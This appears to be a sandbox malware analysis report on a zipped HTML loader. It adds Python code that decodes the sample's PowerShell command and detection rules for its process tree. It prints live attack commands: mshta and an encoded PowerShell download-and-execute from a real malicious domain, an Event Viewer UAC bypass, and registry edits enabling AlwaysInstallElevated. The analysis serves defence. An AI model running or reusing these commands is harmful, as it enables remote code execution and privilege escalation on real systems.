| Field | Value |
|---|---|
| File name | test.zip |
| Full analysis | https://app.any.run/tasks/94361e03-cbb1-4b77-880c-8f37358e7968 |
| Verdict | Malicious activity |
| Threats | Loader. A loader is malicious software that infiltrates a device in order to deliver further payloads: it profiles the infected system and installs other threats such as trojans or stealers. Criminals usually deliver loaders through phishing emails and links, relying on social engineering to get the user to download and run the executable. Loaders employ evasion and persistence techniques to avoid detection. |
| Analysis date | September 19, 2019, 06:48:09 |
| OS | Windows 7 Professional Service Pack 1 (build 7601, 32-bit) |
| Tags | — |
| Indicators | — |
| MIME | application/zip |
| File info | Zip archive data, at least v2.0 to extract |
| MD5 | 5D8D6DE64947112A32F116883196A601 |
| SHA1 | D02D38556987B8AE44D3FD550C5AF311AB3E2B0C |
| SHA256 | 3FAE463DA72B3C456373763A2F0FF06538859DE2F16678F6D8748436DC71C4B6 |
| SSDEEP | 96:SiBRGyETgMWEOHHFvWqMlnMMpT5VN3W7X+ouUk8C4+rH8EE1keS1jn2YpXedf1Bt:ZRGRSMhlF7eu2NCt4EEG1L2+XeITHYf |
| Extension | File type |
|---|---|
| .zip | ZIP compressed archive (100) |

| Archive field | Value |
|---|---|
| ZipRequiredVersion | 20 |
| ZipBitFlag | - |
| ZipCompression | Deflated |
| ZipModifyDate | 2019:09:19 09:42:02 |
| ZipCRC | 0xf547b209 |
| ZipCompressedSize | 7849 |
| ZipUncompressedSize | 42608 |
| ZipFileName | test.html |
| PID | Parent | Integrity | Exit code | Command line | Image path | Description / version |
|---|---|---|---|---|---|---|
| 3564 | explorer.exe | MEDIUM | — | `"C:\Program Files\WinRAR\WinRAR.exe" "C:\Users\admin\AppData\Local\Temp\test.zip"` | C:\Program Files\WinRAR\WinRAR.exe | WinRAR archiver 5.60.0 (Alexander Roshal) |
| 3612 | WinRAR.exe | MEDIUM | — | `"C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\admin\AppData\Local\Temp\Rar$EXa3564.22074\test.html` | C:\Program Files\Internet Explorer\iexplore.exe | Internet Explorer 8.00.7600.16385 (win7_rtm.090713-1255) |
| 4028 | iexplore.exe | MEDIUM | 3221225615 | `"C:\Program Files\Internet Explorer\iexplore.exe" SCODEF:3612 CREDAT:79873` | C:\Program Files\Internet Explorer\iexplore.exe | Internet Explorer 8.00.7600.16385 (win7_rtm.090713-1255) |
| 2684 | iexplore.exe | MEDIUM | 0 | `mshta http://jeitacave.org/hta.hta` | C:\Windows\system32\mshta.exe | Microsoft (R) HTML Application host 8.00.7600.16385 (win7_rtm.090713-1255) |
| 2536 | mshta.exe | MEDIUM | 0 | `"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -windowstyle hidden -exec bypass -nop -windowstyle hidden -exec bypass -EncodedCommand DQAKAEkARQBYACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwADoALwAvAGoAZQBpAHQAYQBjAGEAdgBlAC4AbwByAGcALwBwAHMAMAAwADEALgBqAHAAZwAnACkADQAKAA==` | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Windows PowerShell 6.1.7600.16385 (win7_rtm.090713-1255) |
| 3220 | powershell.exe | MEDIUM | 3221226540 | `"C:\Windows\System32\Eventvwr.exe"` | C:\Windows\System32\Eventvwr.exe | Event Viewer Snapin Launcher 6.1.7600.16385 (win7_rtm.090713-1255) |
| 2624 | powershell.exe | HIGH | 0 | `"C:\Windows\System32\Eventvwr.exe"` | C:\Windows\System32\Eventvwr.exe | Event Viewer Snapin Launcher 6.1.7600.16385 (win7_rtm.090713-1255) |
| 3364 | Eventvwr.exe | HIGH | 0 | `"cmd.exe" /c reg add HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated /t REG_DWORD /d 00000001 /f&reg add HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated /t REG_DWORD /d 00000001 /f` | C:\Windows\system32\cmd.exe | Windows Command Processor 6.1.7601.17514 (win7sp1_rtm.101119-1850) |
| 552 | cmd.exe | HIGH | 0 | `reg add HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated /t REG_DWORD /d 00000001 /f` | C:\Windows\system32\reg.exe | Registry Console Tool 6.1.7600.16385 (win7_rtm.090713-1255) |
| 2676 | cmd.exe | HIGH | 0 | `reg add HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated /t REG_DWORD /d 00000001 /f` | C:\Windows\system32\reg.exe | Registry Console Tool 6.1.7600.16385 (win7_rtm.090713-1255) |

All processes run as user admin; the Indicators column was empty for every row. The `/f&reg add` in PID 3364 is a single cmd.exe line chaining two `reg add` commands with `&` (the source rendered `&reg` as the ® sign). Exit code 3221226540 on PID 3220 is NTSTATUS 0xC000042C (STATUS_ELEVATION_REQUIRED): the MEDIUM-integrity Event Viewer launch failed and was followed by PID 2624, the same image at HIGH integrity, under which cmd.exe then ran elevated.
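The PowerShell command line of PID 2536 carries its script as `-EncodedCommand`, which is base64 over UTF-16LE rather than UTF-8, so a plain base64 decode yields a string with a NUL between every character. The following added example (mine, not ANY.RUN tooling or code from the report) recovers the script from the command line recorded above, pulls out the URL it fetches, and lists the launch switches; the only input is the command line copied from the process table, and the function and flag names are this example's own. It also accepts the abbreviated switch spellings powershell.exe accepts (`-e`, `-ec`, `-enc`, ...), which this sample does not use.

```python
"""Decode the -EncodedCommand of PID 2536 from its recorded command line.

Added example; not ANY.RUN code. CMDLINE_2536 is copied from the process
table of this report. Function and flag names are this example's own.
"""
import base64
import re

ENCODED = "DQAKAEkARQBYACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwADoALwAvAGoAZQBpAHQAYQBjAGEAdgBlAC4AbwByAGcALwBwAHMAMAAwADEALgBqAHAAZwAnACkADQAKAA=="

CMDLINE_2536 = (
    r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" '
    "-nop -windowstyle hidden -exec bypass -nop -windowstyle hidden -exec bypass "
    "-EncodedCommand " + ENCODED
)

ARG_RE = re.compile(r'"[^"]*"|\S+')
URL_RE = re.compile(r"https?://[^\s'\"()]+")


def split_args(cmdline):
    """Tokenise a Windows command line, keeping quoted arguments intact."""
    return [tok.strip('"') for tok in ARG_RE.findall(cmdline)]


def find_encoded_command(args):
    """Return the base64 operand of -EncodedCommand, or None.

    powershell.exe accepts any unambiguous prefix of the switch name (-e, -ec,
    -enc, ...), so prefix-match instead of comparing the full word; -ex and
    -exec belong to -ExecutionPolicy and must not match.
    """
    for i, arg in enumerate(args[:-1]):
        if len(arg) >= 2 and arg[0] in "-/" and "encodedcommand".startswith(arg[1:].lower()):
            return args[i + 1]
    return None


def decode_encoded_command(b64):
    """-EncodedCommand is base64 over UTF-16LE; decoding as UTF-8 leaves NULs between characters."""
    return base64.b64decode(b64).decode("utf-16-le")


def launch_flags(args):
    """Switches that usually accompany fileless one-liners; context, not proof on their own."""
    low = [a.lower() for a in args]
    flags = set()
    for i, a in enumerate(low):
        nxt = low[i + 1] if i + 1 < len(low) else ""
        if a in ("-nop", "-noprofile"):
            flags.add("noprofile")
        elif a in ("-w", "-windowstyle") and nxt == "hidden":
            flags.add("hidden-window")
        elif a in ("-ep", "-exec", "-executionpolicy") and nxt == "bypass":
            flags.add("exec-bypass")
    if find_encoded_command(args) is not None:
        flags.add("encoded-command")
    return sorted(flags)


def analyse(cmdline):
    """Decode the script (if any), extract URLs, and summarise the launch switches."""
    args = split_args(cmdline)
    b64 = find_encoded_command(args)
    script = decode_encoded_command(b64).strip() if b64 else None
    return {
        "script": script,
        "urls": URL_RE.findall(script) if script else [],
        "flags": launch_flags(args),
    }


if __name__ == "__main__":
    result = analyse(CMDLINE_2536)
    print(result["script"])
    print(result["urls"], result["flags"])
```

The decoded one-liner is a `DownloadString` of `http://jeitacave.org/ps001.jpg` piped into `IEX`, which is exactly the second request in the HTTP table below (PID 2536, content classified as text despite the `.jpg` name). The script runs entirely in memory; the only on-disk artefacts are the ones PowerShell itself leaves behind.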
| PID | Process | Filename | Type | MD5 | SHA256 |
|---|---|---|---|---|---|
| 3612 | iexplore.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\LH043OAM\favicon[1].ico | — | — | — |
| 3612 | iexplore.exe | C:\Users\admin\AppData\LocalLow\Microsoft\Internet Explorer\Services\search_{0633EE93-D776-472f-A0FF-E1416B8B2E3A}.ico | — | — | — |
| 2536 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\F5I1QDH0MTRWM6YAY1AW.temp | — | — | — |
| 3612 | iexplore.exe | C:\Users\admin\AppData\Local\Temp\~DF61337B47EBFD912D.TMP | — | — | — |
| 3612 | iexplore.exe | C:\Users\admin\AppData\Local\Microsoft\Internet Explorer\Recovery\Active\{829A1EE0-DAA9-11E9-B86F-5254004A04AF}.dat | — | — | — |
| 1260 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\6DXAI1ZM92V69QS5HW3I.temp | — | — | — |
| 1260 | powershell.exe | C:\Users\admin\AppData\Local\Temp\fxbnopas.0.cs | — | — | — |
| 1260 | powershell.exe | C:\Users\admin\AppData\Local\Temp\fxbnopas.cmdline | — | — | — |
| 3300 | csc.exe | C:\Users\admin\AppData\Local\Temp\CSC11F1.tmp | — | — | — |
| 3300 | csc.exe | C:\Users\admin\AppData\Local\Temp\fxbnopas.pdb | — | — | — |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
2684 | mshta.exe | GET | 200 | 104.28.18.126:80 | http://jeitacave.org/hta.hta | US | html | 466 b | malicious |
2536 | powershell.exe | GET | 200 | 104.28.18.126:80 | http://jeitacave.org/ps001.jpg | US | text | 81.6 Kb | malicious |
3836 | msiexec.exe | GET | 200 | 104.28.18.126:80 | http://jeitacave.org/1U22nOJHFdDmYcgCS.jpg | US | executable | 3.43 Mb | malicious |
3612 | iexplore.exe | GET | 200 | 204.79.197.200:80 | http://www.bing.com/favicon.ico | US | image | 237 b | whitelisted |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
3612 | iexplore.exe | 204.79.197.200:80 | www.bing.com | Microsoft Corporation | US | whitelisted |
2536 | powershell.exe | 104.28.18.126:80 | jeitacave.org | Cloudflare Inc | US | shared |
2684 | mshta.exe | 104.28.18.126:80 | jeitacave.org | Cloudflare Inc | US | shared |
3836 | msiexec.exe | 104.28.18.126:80 | jeitacave.org | Cloudflare Inc | US | shared |
| Domain | IP | Reputation |
|---|---|---|
| www.bing.com | — | whitelisted |
| jeitacave.org | — | malicious |
PID | Process | Class | Message |
---|---|---|---|
2684 | mshta.exe | Potentially Bad Traffic | ET POLICY Possible HTA Application Download |
2684 | mshta.exe | Attempted User Privilege Gain | ET CURRENT_EVENTS SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl |
3836 | msiexec.exe | Misc activity | SUSPICIOUS [PTsecurity] Using msiexec.exe for Downloading non-MSI file |
3836 | msiexec.exe | Misc activity | SUSPICIOUS [PTsecurity] PE as Image Content type mismatch |
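The Suricata alerts above cover the network side only. On the host, the same chain leaves a distinctive process-tree shape: a script host (mshta.exe) spawning PowerShell; Event Viewer exiting with STATUS_ELEVATION_REQUIRED at MEDIUM integrity and then running at HIGH from the same parent; a HIGH-integrity cmd.exe under Event Viewer writing `AlwaysInstallElevated` into both hives (Windows Installer honours the policy only when it is set under both HKCU and HKLM); and msiexec.exe (PID 3836, which appears only in the network tables of this report) fetching a PE served under a `.jpg` name. The added example below (mine, not part of the report or of ANY.RUN) encodes those checks as rules over records transcribed from the tables above. The record layout and rule names are this example's own, and the base64 in the PowerShell command line is elided in the transcription because no rule needs it.

```python
"""Host-side triage rules for the process tree in this report.

Added example; not ANY.RUN code. PROCESSES and HTTP are transcribed from the
tables of this report (pid, parent image, image, integrity, exit code, command
line); the simplified record layout and the rule names are this example's own.
"""
import re

STATUS_ELEVATION_REQUIRED = 0xC000042C  # NTSTATUS; the report prints it as 3221226540

PROCESSES = [
    dict(pid=3564, parent="explorer.exe", image="WinRAR.exe", integrity="MEDIUM", exit=None,
         cmd=r'"C:\Program Files\WinRAR\WinRAR.exe" "C:\Users\admin\AppData\Local\Temp\test.zip"'),
    dict(pid=3612, parent="WinRAR.exe", image="iexplore.exe", integrity="MEDIUM", exit=None,
         cmd=r'"C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\admin\AppData\Local\Temp\Rar$EXa3564.22074\test.html'),
    dict(pid=2684, parent="iexplore.exe", image="mshta.exe", integrity="MEDIUM", exit=0,
         cmd="mshta http://jeitacave.org/hta.hta"),
    # base64 operand elided in this transcription; no rule below needs it
    dict(pid=2536, parent="mshta.exe", image="powershell.exe", integrity="MEDIUM", exit=0,
         cmd=r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -windowstyle hidden -exec bypass -EncodedCommand <base64>'),
    dict(pid=3220, parent="powershell.exe", image="Eventvwr.exe", integrity="MEDIUM", exit=3221226540,
         cmd=r'"C:\Windows\System32\Eventvwr.exe"'),
    dict(pid=2624, parent="powershell.exe", image="Eventvwr.exe", integrity="HIGH", exit=0,
         cmd=r'"C:\Windows\System32\Eventvwr.exe"'),
    dict(pid=3364, parent="Eventvwr.exe", image="cmd.exe", integrity="HIGH", exit=0,
         cmd=r'"cmd.exe" /c reg add HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated /t REG_DWORD /d 00000001 /f&reg add HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated /t REG_DWORD /d 00000001 /f'),
    dict(pid=552, parent="cmd.exe", image="reg.exe", integrity="HIGH", exit=0,
         cmd=r'reg add HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated /t REG_DWORD /d 00000001 /f'),
    dict(pid=2676, parent="cmd.exe", image="reg.exe", integrity="HIGH", exit=0,
         cmd=r'reg add HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated /t REG_DWORD /d 00000001 /f'),
]

HTTP = [  # HTTP requests table: pid, image, url, content type as classified by the sandbox
    dict(pid=2684, image="mshta.exe", url="http://jeitacave.org/hta.hta", ctype="html"),
    dict(pid=2536, image="powershell.exe", url="http://jeitacave.org/ps001.jpg", ctype="text"),
    dict(pid=3836, image="msiexec.exe", url="http://jeitacave.org/1U22nOJHFdDmYcgCS.jpg", ctype="executable"),
]

SCRIPT_HOSTS = {"mshta.exe", "wscript.exe", "cscript.exe"}
SHELLS = {"cmd.exe", "powershell.exe"}


def rule_script_host_spawns_powershell(procs):
    """mshta/wscript/cscript launching PowerShell: the HTA-to-PowerShell hand-off at PID 2536."""
    return [p["pid"] for p in procs
            if p["image"].lower() == "powershell.exe" and p["parent"].lower() in SCRIPT_HOSTS]


def rule_eventvwr_spawns_shell(procs):
    """Event Viewer has no legitimate reason to start a shell; a HIGH-integrity
    cmd/powershell under Eventvwr.exe is the shape of the eventvwr auto-elevation abuse."""
    return [p["pid"] for p in procs
            if p["parent"].lower() == "eventvwr.exe" and p["image"].lower() in SHELLS
            and p["integrity"] == "HIGH"]


def rule_elevation_required_then_high(procs):
    """A MEDIUM launch ending in STATUS_ELEVATION_REQUIRED followed by the same image at
    HIGH from the same parent: something satisfied or bypassed the elevation step."""
    failed = [p for p in procs if p["integrity"] == "MEDIUM" and p["exit"] == STATUS_ELEVATION_REQUIRED]
    return [(p["pid"], q["pid"]) for p in failed for q in procs
            if q["image"] == p["image"] and q["parent"] == p["parent"] and q["integrity"] == "HIGH"]


AIE_RE = re.compile(
    r"(HKEY_CURRENT_USER|HKCU|HKEY_LOCAL_MACHINE|HKLM)\\Software\\Policies\\Microsoft\\Windows\\Installer\b"
    r".*?AlwaysInstallElevated.*?/d\s+0*1\b", re.I)


def rule_always_install_elevated(procs):
    """Return (pids, both_hives). The policy is effective only with the value set to 1
    under both HKCU and HKLM, which is exactly what PID 3364 does in one cmd line."""
    pids, hives = [], set()
    for p in procs:
        found = [h.upper() for h in AIE_RE.findall(p["cmd"])]
        if found:
            pids.append(p["pid"])
            hives.update(found)
    user = bool(hives & {"HKEY_CURRENT_USER", "HKCU"})
    machine = bool(hives & {"HKEY_LOCAL_MACHINE", "HKLM"})
    return pids, user and machine


def rule_msiexec_non_msi_download(http):
    """msiexec.exe can install straight from a URL; a non-.msi path or a PE body is the
    host-side counterpart of the PTsecurity 'Downloading non-MSI file' alert above."""
    return [r["pid"] for r in http
            if r["image"].lower() == "msiexec.exe"
            and (not r["url"].lower().endswith(".msi") or r["ctype"] == "executable")]


def run_all(procs=PROCESSES, http=HTTP):
    return {
        "script_host_spawns_powershell": rule_script_host_spawns_powershell(procs),
        "eventvwr_spawns_shell": rule_eventvwr_spawns_shell(procs),
        "elevation_required_then_high": rule_elevation_required_then_high(procs),
        "always_install_elevated": rule_always_install_elevated(procs),
        "msiexec_non_msi_download": rule_msiexec_non_msi_download(http),
    }


if __name__ == "__main__":
    for name, hits in run_all().items():
        print(f"{name}: {hits}")
```

Each rule on its own is weak (administrators do run `reg add` at HIGH integrity); the value is that all five fire on one tree within seconds of a browser opening an extracted `test.html`. With `AlwaysInstallElevated` set in both hives, any MSI the user launches, including one msiexec pulls from a URL, installs as SYSTEM, which is the likely purpose of the PID 3836 download.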
| Process | Message |
|---|---|
| csc.exe | `*** HR originated: -2147024774` / `*** Source File: d:\iso_whid\x86fre\base\isolation\com\copyout.cpp, line 1302` |
| csc.exe | `*** HR propagated: -2147024774` / `*** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144` |
| csc.exe | `*** HR originated: -2147024774` / `*** Source File: d:\iso_whid\x86fre\base\isolation\com\copyout.cpp, line 1302` |
| csc.exe | `*** HR propagated: -2147024774` / `*** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144` |
| csc.exe | `*** HR originated: -2147024774` / `*** Source File: d:\iso_whid\x86fre\base\isolation\com\copyout.cpp, line 1302` |
| csc.exe | `*** HR propagated: -2147024774` / `*** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144` |
| csc.exe | `*** HR originated: -2147024774` / `*** Source File: d:\iso_whid\x86fre\base\isolation\com\copyout.cpp, line 1302` |
| csc.exe | `*** HR propagated: -2147024774` / `*** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144` |
| csc.exe | `*** HR propagated: -2147024774` / `*** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144` |
| csc.exe | `*** HR propagated: -2147024774` / `*** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144` |

HR -2147024774 is 0x8007007A, HRESULT_FROM_WIN32(ERROR_INSUFFICIENT_BUFFER), raised in the side-by-side activation-context code and commonly logged when csc.exe starts; it is not an indicator by itself. What matters is that csc.exe ran at all: together with the `fxbnopas.0.cs` and `fxbnopas.cmdline` files written by powershell.exe (PID 1260) in the file table above, it shows the downloaded script compiling C# on the fly, the pattern PowerShell's Add-Type produces.